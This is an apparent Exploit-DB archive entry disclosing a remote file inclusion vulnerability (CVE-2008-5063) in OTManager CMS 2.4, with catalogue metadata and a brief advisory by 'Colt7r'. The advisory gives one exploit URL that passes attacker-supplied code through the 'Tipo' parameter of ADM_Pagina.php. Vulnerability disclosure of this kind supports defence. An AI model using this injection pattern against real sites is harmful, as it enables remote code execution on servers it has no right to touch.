OTManager CMS 2.4 - 'Tipo' Remote File Inclusion

Author: Colt7r
type: webapps
platform: php
port: 
date_added: 2008-11-09 
date_updated: 2016-12-14 
verified: 1 
codes: OSVDB-49850;CVE-2008-5063 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comOTManager_v24a_Completo.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  OTManager 2.4 Remote File Inclusion (RFI) Vulnerability

  - Security flaw discovered by Colt7r
  - CONTACT: colt7r |@| bsdmail.org

  - Affected Software: OTManager 2.4
  - Risk: HIGH
  - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-10]